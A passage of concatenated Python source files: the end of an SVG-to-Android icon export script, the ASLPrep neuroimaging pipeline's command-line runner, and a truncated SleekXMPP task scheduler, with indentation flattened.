if is_mipmap:
if is_adaptive:
current_path = current_output_path + '/mipmap-' + dpi_name + '-v26/'
else:
current_path = current_output_path + '/mipmap-' + dpi_name + '/'
else:
current_path = current_output_path + '/drawable-' + dpi_name + '/'
if not os.path.exists(current_path):
os.makedirs(current_path)
work_target = current_path + target
work_target = os.path.normpath(work_target)
work_target = work_target.replace('\\\\','/').replace('\\','/').replace('//','/')
if os.path.isfile(work_target) or os.path.isfile(work_target.replace('.png','.jpg')):
continue
ls = subprocess.Popen([settings.inkscape_path, svg, '-z',
'-e' + work_target,
'-w' + str(twidth),
'-h' + str(theight)],
shell = True,
stdout = subprocess.PIPE, stderr = subprocess.PIPE)
ls.wait()
if not is_mipmap:
export_to_jpg = False
for export_file in convert_jpg.files:
if os.path.normpath(export_file) in os.path.normpath(base_path):
export_to_jpg = True
break
if export_to_jpg:
print(thread_name + print_name + ' > converted')
ls = subprocess.Popen([settings.image_magick, work_target, '-quality', '50',
work_target.replace('.png','.jpg')],
shell = True,
stdout = subprocess.PIPE, stderr = subprocess.PIPE)
ls.wait()
print(thread_name + print_name + ' > removed')
os.remove(work_target)
## -------------
# Get target svgs.
for i in range(len(settings.input_path)):
current_input_path = settings.input_path[i]
if len(settings.output_path) == 1:
current_output_path = settings.output_path[0]
else:
current_output_path = settings.output_path[i]
svgs = []
for root, dirs, files in os.walk(current_input_path):
for file in files:
if file.endswith('.svg'):
print(os.path.join(root, file))
svgs.append(os.path.join(root, file))
#files = glob.glob(current_input_path + '*.svg')
#files = files + glob.glob(current_input_path + '*/*.svg')
print('Found ' + str(len(svgs)) + ' file(s).')
print('Output: ' + current_output_path)
print('\nWorking:')
working_dir = os.path.dirname(os.path.abspath(__file__))
working_dir = working_dir.replace('\\', '/')
index = 0
for index in range(len(settings.output_quality)):
dpi_name = settings.output_quality[index]
current_path = current_output_path + '/mipmap-' + dpi_name + '/'
if not os.path.exists(current_path):
os.makedirs(current_path)
current_path = current_output_path + '/drawable-' + dpi_name + '/'
if not os.path.exists(current_path):
os.makedirs(current_path)
threads = []
for current_thread in range(settings.number_of_threads):
try:
tr = threading.Thread(target=do_work)
tr.daemon = True
tr.start()
threads.append(tr)
except:
print('Error: unable to start thread')
# join all threads
for t in threads:
t.join()
pass
|
run.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""ASL preprocessing workflow."""
import os
import re
from pathlib import Path
import logging
import sys
import gc
import uuid
import warnings
import json
from argparse import ArgumentParser
from argparse import ArgumentDefaultsHelpFormatter
from multiprocessing import cpu_count
from time import strftime
logging.addLevelName(25, 'IMPORTANT') # Add a new level between INFO and WARNING
logging.addLevelName(15, 'VERBOSE') # Add a new level between INFO and DEBUG
logger = logging.getLogger('cli')
def _warn_redirect(message, category, filename, lineno, file=None, line=None):
logger.warning('Captured warning (%s): %s', category, message)
def check_deps(workflow):
from nipype.utils.filemanip import which
return sorted(
(node.interface.__class__.__name__, node.interface._cmd)
for node in workflow._get_all_nodes()
if (hasattr(node.interface, '_cmd') and
which(node.interface._cmd.split()[0]) is None))
def get_parser():
"""Build parser object."""
from packaging.version import Version
from ..__about__ import __version__
from .version import check_latest, is_flagged
from ..niworkflows.utils.spaces import Reference, SpatialReferences, OutputReferencesAction
#verstr = 'ASLPrep v{}'.format(__version__)
#currentv = Version(__version__)
#is_release = not any((currentv.is_devrelease, currentv.is_prerelease, currentv.is_postrelease))
currentv = '0.0.1'
parser = ArgumentParser(description='ASLPrep: ASL PREProcessing workflows',
formatter_class=ArgumentDefaultsHelpFormatter)
# Arguments as specified by BIDS-Apps
# required, positional arguments
# IMPORTANT: they must go directly with the parser object
parser.add_argument('bids_dir', action='store', type=Path,
help='the root folder of a BIDS valid dataset (sub-XXXXX folders should '
'be found at the top level in this folder).')
parser.add_argument('output_dir', action='store', type=Path,
help='the output path for the outcomes of preprocessing and visual '
'reports')
parser.add_argument('analysis_level', choices=['participant'],
help='processing stage to be run, only "participant" in the case of '
'aslprep (see BIDS-Apps specification).')
# optional arguments
parser.add_argument('--version', action='version', version="0.0.1")
g_bids = parser.add_argument_group('Options for filtering BIDS queries')
g_bids.add_argument('--skip_bids_validation', '--skip-bids-validation', action='store_true',
default=True,
help='assume the input dataset is BIDS compliant and skip the validation')
g_bids.add_argument('--participant_label', '--participant-label', action='store', nargs='+',
help='a space delimited list of participant identifiers or a single '
'identifier (the sub- prefix can be removed)')
# Re-enable when option is actually implemented
# g_bids.add_argument('-s', '--session-id', action='store', default='single_session',
# help='select a specific session to be processed')
# Re-enable when option is actually implemented
# g_bids.add_argument('-r', '--run-id', action='store', default='single_run',
# help='select a specific run to be processed')
g_bids.add_argument(
'--bids-filter-file', action='store', type=Path, metavar='PATH',
help='a JSON file describing custom BIDS input filter using pybids '
'{<suffix>:{<entity>:<filter>,...},...} '
'(https://github.com/bids-standard/pybids/blob/master/bids/layout/config/bids.json)')
g_bids.add_argument('-t', '--task-id', action='store',
help='select a specific task to be processed')
g_bids.add_argument('--echo-idx', action='store', type=int,
help='select a specific echo to be processed in a multiecho series')
g_perfm = parser.add_argument_group('Options to handle performance')
g_perfm.add_argument('--nthreads', '--n_cpus', '-n-cpus', action='store', type=int,
help='maximum number of threads across all processes')
g_perfm.add_argument('--omp-nthreads', action='store', type=int, default=0,
help='maximum number of threads per-process')
g_perfm.add_argument('--mem_mb', '--mem-mb', action='store', default=0, type=int,
help='upper bound memory limit for ASLPREP processes')
g_perfm.add_argument('--low-mem', action='store_true',
help='attempt to reduce memory usage (will increase disk usage '
'in working directory)')
g_perfm.add_argument('--use-plugin', action='store', default=None,
help='nipype plugin configuration file')
g_perfm.add_argument('--anat-only', action='store_true',
help='run anatomical workflows only')
g_perfm.add_argument('--boilerplate', action='store_true',
help='generate boilerplate only')
g_perfm.add_argument('--md-only-boilerplate', action='store_true',
default=False,
help='skip generation of HTML and LaTeX formatted citation with pandoc')
#g_perfm.add_argument('--error-on-aroma-warnings', action='store_true',
# default=False,
#help='Raise an error if ICA_AROMA does not produce sensible output '
#'(e.g., if all the components are classified as signal or noise)')
g_perfm.add_argument("-v", "--verbose", dest="verbose_count", action="count", default=0,
help="increases log verbosity for each occurence, debug level is -vvv")
g_conf = parser.add_argument_group('Workflow configuration')
g_conf.add_argument(
'--ignore', required=False, action='store', nargs="+", default=[],
choices=['fieldmaps', 'slicetiming', 'sbref'],
help='ignore selected aspects of the input dataset to disable corresponding '
'parts of the workflow (a space delimited list)')
g_conf.add_argument(
'--longitudinal', action='store_true',
help='treat dataset as longitudinal - may increase runtime')
g_conf.add_argument(
'--t2s-coreg', action='store_true',
help='If provided with multi-echo BOLD dataset, create T2*-map and perform '
'T2*-driven coregistration. When multi-echo data is provided and this '
'option is not enabled, standard EPI-T1 coregistration is performed '
'using the middle echo.')
g_conf.add_argument(
'--output-spaces', nargs='*', action=OutputReferencesAction, default=SpatialReferences(),
help="Standard and non-standard spaces to resample anatomical and functional images to" )
g_conf.add_argument('--bold2t1w-dof', action='store', default=6, choices=[6, 9, 12], type=int,
help='Degrees of freedom when registering BOLD to T1w images. '
'6 degrees (rotation and translation) are used by default.')
g_conf.add_argument(
'--force-bbr', action='store_true', dest='use_bbr', default=None,
help='Always use boundary-based registration (no goodness-of-fit checks)')
g_conf.add_argument(
'--force-no-bbr', action='store_false', dest='use_bbr', default=None,
help='Do not use boundary-based registration (no goodness-of-fit checks)')
g_conf.add_argument(
'--medial-surface-nan', required=False, action='store_true', default=False,
help='Replace medial wall values with NaNs on functional GIFTI files. Only '
'performed for GIFTI files mapped to a freesurfer subject (fsaverage or fsnative).')
g_conf.add_argument(
'--dummy-scans', required=False, action='store', default=None, type=int,
help='Number of non steady state volumes.')
# ANTs options
g_ants = parser.add_argument_group('Specific options for ANTs registrations')
g_ants.add_argument(
'--skull-strip-template', default='OASIS30ANTs', type=Reference.from_string,
help='select a template for skull-stripping with antsBrainExtraction')
g_ants.add_argument('--skull-strip-fixed-seed', action='store_true',
help='do not use a random seed for skull-stripping - will ensure '
'run-to-run replicability when used with --omp-nthreads 1')
# Fieldmap options
g_fmap = parser.add_argument_group('Specific options for handling fieldmaps')
g_fmap.add_argument('--fmap-bspline', action='store_true', default=False,
help='fit a B-Spline field using least-squares (experimental)')
g_fmap.add_argument('--fmap-no-demean', action='store_false', default=True,
help='do not remove median (within mask) from fieldmap')
# SyN-unwarp options
g_syn = parser.add_argument_group('Specific options for SyN distortion correction')
g_syn.add_argument('--use-syn-sdc', action='store_true', default=False,
help='EXPERIMENTAL: Use fieldmap-free distortion correction')
g_syn.add_argument('--force-syn', action='store_true', default=False,
help='EXPERIMENTAL/TEMPORARY: Use SyN correction in addition to '
'fieldmap correction, if available')
# FreeSurfer options
g_fs = parser.add_argument_group('Specific options for FreeSurfer preprocessing')
g_fs.add_argument(
'--fs-license-file', metavar='PATH', type=Path,
help='Path to FreeSurfer license key file. Get it (for free) by registering'
' at https://surfer.nmr.mgh.harvard.edu/registration.html')
g_fs.add_argument(
'--fs-subjects-dir', metavar='PATH', type=Path,
help='Path to existing FreeSurfer subjects directory to reuse. '
'(default: OUTPUT_DIR/freesurfer)')
# Surface generation xor
g_surfs = parser.add_argument_group('Surface preprocessing options')
g_surfs.add_argument('--no-submm-recon', action='store_false', dest='hires',
help='disable sub-millimeter (hires) reconstruction')
g_surfs_xor = g_surfs.add_mutually_exclusive_group()
g_surfs_xor.add_argument('--cifti-output', nargs='?', const='91k', default=False,
choices=('91k', '170k'), type=str,
help='output preprocessed BOLD as a CIFTI dense timeseries. '
'Optionally, the number of grayordinate can be specified '
'(default is 91k, which equates to 2mm resolution)')
g_surfs_xor.add_argument('--fs-no-reconall',
action='store_false', dest='run_reconall',
help='disable FreeSurfer surface preprocessing.')
g_other = parser.add_argument_group('Other options')
g_other.add_argument('-w', '--work-dir', action='store', type=Path, default=Path('work'),
help='path where intermediate results should be stored')
g_other.add_argument('--clean-workdir', action='store_true', default=False,
help='Clears working directory of contents. Use of this flag is not '
'recommended when running concurrent processes of ASLPrep.')
g_other.add_argument(
'--resource-monitor', action='store_true', default=False,
help='enable Nipype\'s resource monitoring to keep track of memory and CPU usage')
g_other.add_argument(
'--reports-only', action='store_true', default=False,
help='only generate reports, don\'t run workflows. This will only rerun report '
'aggregation, not reportlet generation for specific nodes.')
g_other.add_argument(
'--run-uuid', action='store', default=None,
help='Specify UUID of previous run, to include error logs in report. '
'No effect without --reports-only.')
g_other.add_argument('--write-graph', action='store_true', default=False,
help='Write workflow graph.')
g_other.add_argument('--stop-on-first-crash', action='store_true', default=False,
help='Force stopping on first crash, even if a work directory'
' was specified.')
g_other.add_argument('--notrack', action='store_true', default=False,
help='Opt-out of sending tracking information of this run to '
'the ASLPREP developers. This information helps to '
'improve ASLPREP and provides an indicator of real '
'world usage crucial for obtaining funding.')
g_other.add_argument('--sloppy', action='store_true', default=False,
help='Use low-quality tools for speed - TESTING ONLY')
g_other.add_argument('--pcasl', action='store_true', default=True,
help='data are PCASL rather than PASL; if not set, the CBF '
'computation will assume PASL (also specified in the ASL metadata)')
#latest = check_latest()
#if latest is not None and currentv < latest:
return parser
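# Invocation sketch (illustrative; paths and labels are placeholders):
#   aslprep /data/bids /data/out participant \
#       --participant-label 01 --fs-license-file /opt/freesurfer/license.txt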
def main():
"""Entry point"""
from nipype import logging as nlogging
from multiprocessing import set_start_method, Process, Manager
from ..utils.bids import write_derivative_description, validate_input_dir
set_start_method('forkserver')
warnings.showwarning = _warn_redirect
opts = get_parser().parse_args()
exec_env = os.name
# special variable set in the container
if os.getenv('IS_DOCKER_8395080871'):
exec_env = 'singularity'
cgroup = Path('/proc/1/cgroup')
if cgroup.exists() and 'docker' in cgroup.read_text():
exec_env = 'docker'
if os.getenv('DOCKER_VERSION_8395080871'):
exec_env = 'aslprep-docker'
sentry_sdk = None
if not opts.notrack:
import sentry_sdk
from ..utils.sentry import sentry_setup
sentry_setup(opts, exec_env)
# Validate inputs
if not opts.skip_bids_validation:
print("Making sure the input data is BIDS compliant (warnings can be ignored in most "
"cases).")
validate_input_dir(exec_env, opts.bids_dir, opts.participant_label)
# FreeSurfer license
default_license = str(Path(os.getenv('FREESURFER_HOME', '')) / 'license.txt') # avoid TypeError when FREESURFER_HOME is unset
# Precedence: --fs-license-file, $FS_LICENSE, default_license
license_file = opts.fs_license_file or Path(os.getenv('FS_LICENSE', default_license))
if not license_file.exists():
raise RuntimeError("""\
ERROR: a valid license file is required for FreeSurfer to run. ASLPrep looked for an existing \
license file at several paths, in this order: 1) command line argument ``--fs-license-file``; \
2) ``$FS_LICENSE`` environment variable; and 3) the ``$FREESURFER_HOME/license.txt`` path. Get it \
(for free) by registering at https://surfer.nmr.mgh.harvard.edu/registration.html""")
os.environ['FS_LICENSE'] = str(license_file.resolve())
# Retrieve logging level
log_level = int(max(25 - 5 * opts.verbose_count, logging.DEBUG))
# Set logging
logger.setLevel(log_level)
logger.addHandler(logging.StreamHandler())
nlogging.getLogger('nipype.workflow').setLevel(log_level)
nlogging.getLogger('nipype.interface').setLevel(log_level)
nlogging.getLogger('nipype.utils').setLevel(log_level)
# Call build_workflow(opts, retval)
with Manager() as mgr:
retval = mgr.dict()
p = Process(target=build_workflow, args=(opts, retval))
p.start()
p.join()
retcode = p.exitcode or retval.get('return_code', 0)
bids_dir = Path(retval.get('bids_dir'))
output_dir = Path(retval.get('output_dir'))
work_dir = Path(retval.get('work_dir'))
plugin_settings = retval.get('plugin_settings', None)
subject_list = retval.get('subject_list', None)
aslprep_wf = retval.get('workflow', None)
run_uuid = retval.get('run_uuid', None)
if opts.reports_only:
sys.exit(int(retcode > 0))
if opts.boilerplate:
sys.exit(int(retcode > 0))
if aslprep_wf and opts.write_graph:
aslprep_wf.write_graph(graph2use="colored", format='svg', simple_form=True)
retcode = retcode or int(aslprep_wf is None)
if retcode != 0:
sys.exit(retcode)
# Check workflow for missing commands
missing = check_deps(aslprep_wf)
if missing:
print("Cannot run ASLPrep. Missing dependencies:", file=sys.stderr)
for iface, cmd in missing:
print("\t{} (Interface: {})".format(cmd, iface))
sys.exit(2)
# Clean up master process before running workflow, which may create forks
gc.collect()
# Sentry tracking
if not opts.notrack:
from ..utils.sentry import start_ping
start_ping(run_uuid, len(subject_list))
errno = 1 # Default is error exit unless otherwise set
try:
aslprep_wf.run(**plugin_settings)
except Exception as e:
if not opts.notrack:
from ..utils.sentry import process_crashfile
crashfolders = [output_dir / 'aslprep' / 'sub-{}'.format(s) / 'log' / run_uuid
for s in subject_list]
for crashfolder in crashfolders:
for crashfile in crashfolder.glob('crash*.*'):
process_crashfile(crashfile)
if "Workflow did not execute cleanly" not in str(e):
sentry_sdk.capture_exception(e)
logger.critical('ASLPrep failed: %s', e)
raise
else:
if opts.run_reconall:
from templateflow import api
from ..niworkflows.utils.misc import _copy_any
dseg_tsv = str(api.get('fsaverage', suffix='dseg', extension=['.tsv']))
_copy_any(dseg_tsv,
str(output_dir / 'aslprep' / 'desc-aseg_dseg.tsv'))
_copy_any(dseg_tsv,
str(output_dir / 'aslprep' / 'desc-aparcaseg_dseg.tsv'))
errno = 0
logger.log(25, 'ASLPrep finished without errors')
if not opts.notrack:
sentry_sdk.capture_message('ASLPrep finished without errors',
level='info')
finally:
from ..niworkflows.reports import generate_reports
from subprocess import check_call, CalledProcessError, TimeoutExpired
from pkg_resources import resource_filename as pkgrf
from shutil import copyfile
citation_files = {
ext: output_dir / 'aslprep' / 'logs' / ('CITATION.%s' % ext)
for ext in ('bib', 'tex', 'md', 'html')
}
if not opts.md_only_boilerplate and citation_files['md'].exists():
# Generate HTML file resolving citations
cmd = ['pandoc', '-s', '--bibliography',
pkgrf('aslprep', 'data/boilerplate.bib'),
'--filter', 'pandoc-citeproc',
'--metadata', 'pagetitle="ASLPrep citation boilerplate"',
str(citation_files['md']),
'-o', str(citation_files['html'])]
logger.info('Generating an HTML version of the citation boilerplate...')
try:
check_call(cmd, timeout=10)
except (FileNotFoundError, CalledProcessError, TimeoutExpired):
logger.warning('Could not generate CITATION.html file:\n%s',
' '.join(cmd))
# Generate LaTeX file resolving citations
cmd = ['pandoc', '-s', '--bibliography',
pkgrf('aslprep', 'data/boilerplate.bib'),
'--natbib', str(citation_files['md']),
'-o', str(citation_files['tex'])]
logger.info('Generating a LaTeX version of the citation boilerplate...')
try:
check_call(cmd, timeout=10)
except (FileNotFoundError, CalledProcessError, TimeoutExpired):
logger.warning('Could not generate CITATION.tex file:\n%s',
' '.join(cmd))
else:
copyfile(pkgrf('aslprep', 'data/boilerplate.bib'),
citation_files['bib'])
else:
logger.warning('ASLPrep could not find the markdown version of '
'the citation boilerplate (%s). HTML and LaTeX versions'
' of it will not be available', citation_files['md'])
# Generate reports phase
failed_reports = generate_reports(
subject_list, output_dir, work_dir, run_uuid,
config=pkgrf('aslprep', 'data/reports-spec.yml'),
packagename='aslprep')
write_derivative_description(bids_dir, output_dir / 'aslprep')
if failed_reports and not opts.notrack:
sentry_sdk.capture_message(
'Report generation failed for %d subjects' % failed_reports,
level='error')
sys.exit(int((errno + failed_reports) > 0))
def build_workflow(opts, retval):
"""
Create the Nipype Workflow that supports the whole execution
graph, given the inputs.
All the checks and the construction of the workflow are done
inside this function that has pickleable inputs and output
dictionary (``retval``) to allow isolation using a
``multiprocessing.Process`` that allows aslprep to enforce
a hard-limited memory-scope.
"""
from ..pybids import BIDSLayout
from nipype import logging as nlogging, config as ncfg
from ..niworkflows.utils.bids import collect_participants, check_pipeline_version
from ..niworkflows.reports import generate_reports
from ..__about__ import __version__
from ..workflows.base import init_aslprep_wf
build_log = nlogging.getLogger('nipype.workflow')
INIT_MSG = """
Running ASLPREP version {version}:
* BIDS dataset path: {bids_dir}.
* Participant list: {subject_list}.
* Run identifier: {uuid}.
{spaces}
""".format
bids_dir = opts.bids_dir.resolve()
output_dir = opts.output_dir.resolve()
work_dir = opts.work_dir.resolve()
bids_filters = json.loads(opts.bids_filter_file.read_text()) if opts.bids_filter_file else None
if opts.clean_workdir:
from ..niworkflows.utils.misc import clean_directory
build_log.info("Clearing previous ASLPrep working directory: %s" % work_dir)
if not clean_directory(work_dir):
build_log.warning("Could not clear all contents of working directory: %s" % work_dir)
retval['return_code'] = 1
retval['workflow'] = None
retval['bids_dir'] = str(bids_dir)
retval['output_dir'] = str(output_dir)
retval['work_dir'] = str(work_dir)
if output_dir == bids_dir:
build_log.error(
'The selected output folder is the same as the input BIDS folder. '
'Please modify the output path (suggestion: %s).',
bids_dir / 'derivatives' / ('aslprep-%s' % __version__.split('+')[0]))
retval['return_code'] = 1
return retval
# warn if older results exist
msg = check_pipeline_version(
__version__, output_dir / 'aslprep' / 'dataset_description.json'
)
if msg is not None:
build_log.warning(msg)
if bids_dir in work_dir.parents:
build_log.error(
'The selected working directory is a subdirectory of the input BIDS folder. '
'Please modify the output path.')
retval['return_code'] = 1
return retval
# Set up some instrumental utilities
run_uuid = '%s_%s' % (strftime('%Y%m%d-%H%M%S'), uuid.uuid4())
retval['run_uuid'] = run_uuid
# First check that bids_dir looks like a BIDS folder
layout = BIDSLayout(str(bids_dir), validate=False,
ignore=("code", "stimuli", "sourcedata", "models",
"derivatives", re.compile(r'^\.')))
subject_list = collect_participants(
layout, participant_label=opts.participant_label)
retval['subject_list'] = subject_list
# Load base plugin_settings from file if --use-plugin
if opts.use_plugin is not None:
from yaml import load as loadyml
with open(opts.use_plugin) as f:
plugin_settings = loadyml(f)
plugin_settings.setdefault('plugin_args', {})
else:
# Defaults
plugin_settings = {
'plugin': 'MultiProc',
'plugin_args': {
'raise_insufficient': False,
'maxtasksperchild': 1,
}
}
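# An illustrative ``--use-plugin`` YAML file (the keys follow Nipype's
# plugin interface; the values here are made-up examples):
#
#     plugin: MultiProc
#     plugin_args:
#       n_procs: 8
#       memory_gb: 32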
# Resource management options
# Note that we're making strong assumptions about valid plugin args
# This may need to be revisited if people try to use batch plugins
nthreads = plugin_settings['plugin_args'].get('n_procs')
# Permit overriding plugin config with specific CLI options
if nthreads is None or opts.nthreads is not None:
nthreads = opts.nthreads
if nthreads is None or nthreads < 1:
nthreads = cpu_count()
plugin_settings['plugin_args']['n_procs'] = nthreads
if opts.mem_mb:
plugin_settings['plugin_args']['memory_gb'] = opts.mem_mb / 1024
omp_nthreads = opts.omp_nthreads
if omp_nthreads == 0:
omp_nthreads = min(nthreads - 1 if nthreads > 1 else cpu_count(), 8)
if 1 < nthreads < omp_nthreads:
build_log.warning(
'Per-process threads (--omp-nthreads=%d) exceed total '
'threads (--nthreads/--n_cpus=%d)', omp_nthreads, nthreads)
retval['plugin_settings'] = plugin_settings
# Set up directories
log_dir = output_dir / 'aslprep' / 'logs'
# Check and create output and working directories
output_dir.mkdir(exist_ok=True, parents=True)
log_dir.mkdir(exist_ok=True, parents=True)
work_dir.mkdir(exist_ok=True, parents=True)
# Nipype config (logs and execution)
ncfg.update_config({
'logging': {
'log_directory': str(log_dir),
'log_to_file': True
},
'execution': {
'crashdump_dir': str(log_dir),
'crashfile_format': 'txt',
'get_linked_libs': False,
'stop_on_first_crash': opts.stop_on_first_crash,
},
'monitoring': {
'enabled': opts.resource_monitor,
'sample_frequency': '0.5',
'summary_append': True,
}
})
if opts.resource_monitor:
ncfg.enable_resource_monitor()
# Called with reports only
if opts.reports_only:
from pkg_resources import resource_filename as pkgrf
build_log.log(25, 'Running --reports-only on participants %s', ', '.join(subject_list))
if opts.run_uuid is not None:
run_uuid = opts.run_uuid
retval['run_uuid'] = run_uuid
retval['return_code'] = generate_reports(
subject_list, output_dir, work_dir, run_uuid,
config=pkgrf('aslprep', 'data/reports-spec.yml'),
packagename='aslprep')
return retval
# Build main workflow
build_log.log(25, INIT_MSG(
version=__version__,
bids_dir=bids_dir,
subject_list=subject_list,
uuid=run_uuid,
spaces=opts.output_spaces)
)
retval['workflow'] = init_aslprep_wf(
anat_only=opts.anat_only,
#aroma_melodic_dim=opts.aroma_melodic_dimensionality,
bold2t1w_dof=opts.bold2t1w_dof,
cifti_output=opts.cifti_output,
debug=opts.sloppy,
dummy_scans=opts.dummy_scans,
echo_idx=opts.echo_idx,
#err_on_aroma_warn=opts.error_on_aroma_warnings,
fmap_bspline=opts.fmap_bspline,
fmap_demean=opts.fmap_no_demean,
force_syn=opts.force_syn,
freesurfer=opts.run_reconall,
fs_subjects_dir=opts.fs_subjects_dir,
hires=opts.hires,
ignore=opts.ignore,
layout=layout,
longitudinal=opts.longitudinal,
low_mem=opts.low_mem,
medial_surface_nan=opts.medial_surface_nan,
omp_nthreads=omp_nthreads,
output_dir=str(output_dir),
run_uuid=run_uuid,
#regressors_all_comps=opts.return_all_components,
#regressors_fd_th=opts.fd_spike_threshold,
#regressors_dvars_th=opts.dvars_spike_threshold,
skull_strip_fixed_seed=opts.skull_strip_fixed_seed,
skull_strip_template=opts.skull_strip_template[0],
spaces=parse_spaces(opts),
subject_list=subject_list,
t2s_coreg=opts.t2s_coreg,
task_id=opts.task_id,
#use_aroma=opts.use_aroma,
use_bbr=opts.use_bbr,
use_syn=opts.use_syn_sdc,
work_dir=str(work_dir),
pcasl=opts.pcasl,
bids_filters=bids_filters,
)
retval['return_code'] = 0
logs_path = Path(output_dir) / 'aslprep' / 'logs'
boilerplate = retval['workflow'].visit_desc()
if boilerplate:
citation_files = {
ext: logs_path / ('CITATION.%s' % ext)
for ext in ('bib', 'tex', 'md', 'html')
}
# To please git-annex users and also to guarantee consistency
# among different renderings of the same file, first remove any
# existing one
for citation_file in citation_files.values():
try:
citation_file.unlink()
except FileNotFoundError:
pass
citation_files['md'].write_text(boilerplate)
build_log.log(25, 'Works derived from this ASLPrep execution should '
'include the following boilerplate:\n\n%s', boilerplate)
return retval
def parse_spaces(opts):
"""
Ensure user-defined spatial references for outputs are correctly parsed.
Certain options require normalization to a space not explicitly defined by users.
These spaces will not be included in the final outputs.
"""
spaces = opts.output_spaces
if not spaces.references and not spaces.is_cached():
spaces.add('MNI152NLin2009cAsym')
if not spaces.is_cached():  # spaces may already be checkpointed if users want no BOLD outputs
spaces.checkpoint()
#if opts.use_aroma:
# Make sure there's a normalization to FSL for AROMA to use.
# spaces.add(('MNI152NLin6Asym', {'res': '2'}))
if opts.cifti_output:
# CIFTI grayordinates to corresponding FSL-MNI resolutions.
vol_res = '2' if opts.cifti_output == '91k' else '1'
spaces.add(('fsaverage', {'den': '164k'}))
spaces.add(('MNI152NLin6Asym', {'res': vol_res}))
# Add the default standard space if not already present (required by several sub-workflows)
if "MNI152NLin2009cAsym" not in spaces.get_spaces(nonstandard=False, dim=(3,)):
spaces.add("MNI152NLin2009cAsym")
return spaces
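# Illustrative example (assumed from the logic above, not part of ASLPrep):
# for a run with ``--cifti-output 91k`` and no user-specified output spaces,
# parse_spaces() would yield references equivalent to:
#
#     MNI152NLin2009cAsym       (default standard space)
#     fsaverage:den-164k        (CIFTI surface grayordinates)
#     MNI152NLin6Asym:res-2     (CIFTI 91k volume resolution)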
if __name__ == '__main__':
raise RuntimeError("aslprep/cli/run.py should not be run directly;\n"
"Please `pip install` aslprep and use the `aslprep` command")
|
scheduler.py | """
SleekXMPP: The Sleek XMPP Library
Copyright (C) 2010 Nathanael C. Fritz
This file is part of SleekXMPP.
See the file LICENSE for copying permission.
"""
import time
import threading
import logging
try:
import queue
except ImportError:
import Queue as queue
log = logging.getLogger(__name__)
class Task(object):
"""
A scheduled task that will be executed by the scheduler
after a given time interval has passed.
Attributes:
name -- The name of the task.
seconds -- The number of seconds to wait before executing.
callback -- The function to execute.
args -- The arguments to pass to the callback.
kwargs -- The keyword arguments to pass to the callback.
repeat -- Indicates if the task should repeat.
Defaults to False.
qpointer -- A pointer to an event queue for queuing callback
execution instead of executing immediately.
Methods:
run -- Either queue or execute the callback.
reset -- Reset the task's timer.
"""
def __init__(self, name, seconds, callback, args=None,
kwargs=None, repeat=False, qpointer=None):
"""
Create a new task.
Arguments:
name -- The name of the task.
seconds -- The number of seconds to wait before executing.
callback -- The function to execute.
args -- The arguments to pass to the callback.
kwargs -- The keyword arguments to pass to the callback.
repeat -- Indicates if the task should repeat.
Defaults to False.
qpointer -- A pointer to an event queue for queuing callback
execution instead of executing immediately.
"""
self.name = name
self.seconds = seconds
self.callback = callback
self.args = args or tuple()
self.kwargs = kwargs or {}
self.repeat = repeat
self.next = time.time() + self.seconds
self.qpointer = qpointer
def run(self):
"""
Execute the task's callback.
If an event queue was supplied, place the callback in the queue;
otherwise, execute the callback immediately.
"""
if self.qpointer is not None:
self.qpointer.put(('schedule', self.callback,
self.args, self.name))
else:
self.callback(*self.args, **self.kwargs)
self.reset()
return self.repeat
def reset(self):
"""
Reset the task's timer so that it will repeat.
"""
self.next = time.time() + self.seconds
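# Minimal usage sketch for Task (illustrative, assuming a plain callback
# and no event queue):
#
#     def tick():
#         print('tick')
#
#     task = Task('tick', 2.0, tick, repeat=True)
#     if time.time() >= task.next:
#         task.run()  # executes tick(), resets the timer, returns True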
class Scheduler(object):
"""
A threaded scheduler that, unlike the scheduler in the standard
library, allows tasks to be added or removed mid-execution.
http://docs.python.org/library/sched.html#module-sched
Attributes:
addq -- A queue storing added tasks.
schedule -- A list of tasks in order of execution times.
thread -- If threaded, the thread processing the schedule.
run -- Indicates if the scheduler is running.
stop -- Threading event indicating if the main process
has been stopped.
Methods:
add -- Add a new task to the schedule.
process -- Process and schedule tasks.
quit -- Stop the scheduler.
"""
def __init__(self, parentstop=None):
"""
Create a new scheduler.
Arguments:
parentstop -- A threading event indicating if the main process has
been stopped.
"""
self.addq = queue.Queue()
self.schedule = []
self.thread = None
self.run = False
self.stop = parentstop
self.schedule_lock = threading.RLock()
def process(self, threaded=True):
"""
Begin accepting and processing scheduled tasks.
Arguments:
threaded -- Indicates if the scheduler should execute in its own
thread. Defaults to True.
"""
if threaded:
self.thread = threading.Thread(name='scheduler_process',
target=self._process)
self.thread.daemon = True
self.thread.start()
else:
self._process()
def _process(self):
"""Process scheduled tasks."""
self.run = True
try:
while self.run and not self.stop.isSet():
wait = 1
updated = False
if self.schedule:
wait = self.schedule[0].next - time.time()
try:
if wait <= 0.0:
newtask = self.addq.get(False)
else:
if wait >= 3.0:
wait = 3.0
newtask = self.addq.get(True, wait)
except queue.Empty:
cleanup = []
self.schedule_lock.acquire()
for task in self.schedule:
if time.time() >= task.next:
updated = True
if not task.run():
cleanup.append(task)
else:
break
for task in cleanup:
self.schedule.remove(task)
else:
updated = True
self.schedule_lock.acquire()
self.schedule.append(newtask)
finally:
if updated:
self.schedule = sorted(self.schedule,
key=lambda task: task.next)
self.schedule_lock.release()
except KeyboardInterrupt:
self.run = False
except SystemExit:
self.run = False
log.debug("Quitting Scheduler thread")
def add(self, name, seconds, callback, args=None,
kwargs=None, repeat=False, qpointer=None):
"""
Schedule a new task.
Arguments:
name -- The name of the task.
seconds -- The number of seconds to wait before executing.
callback -- The function to execute.
args -- The arguments to pass to the callback.
kwargs -- The keyword arguments to pass to the callback.
repeat -- Indicates if the task should repeat.
Defaults to False.
qpointer -- A pointer to an event queue for queuing callback
execution instead of executing immediately.
"""
try:
self.schedule_lock.acquire()
for task in self.schedule:
if task.name == name:
raise ValueError("Key %s already exists" % name)
self.addq.put(Task(name, seconds, callback, args,
kwargs, repeat, qpointer))
finally:
self.schedule_lock.release()
def remove(self, name):
"""
Remove a scheduled task before its timer expires, without
executing it.
Arguments:
name -- The name of the task to remove.
"""
try:
self.schedule_lock.acquire()
the_task = None
for task in self.schedule:
if task.name == name:
the_task = task
if the_task is not None:
self.schedule.remove(the_task)
finally:
self.schedule_lock.release()
def quit(self):
"""Shutdown the scheduler."""
self.run = False
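if __name__ == '__main__':
    # Minimal demonstration (illustrative; not part of SleekXMPP): run the
    # scheduler in its own thread, fire a repeating task for ~2 seconds,
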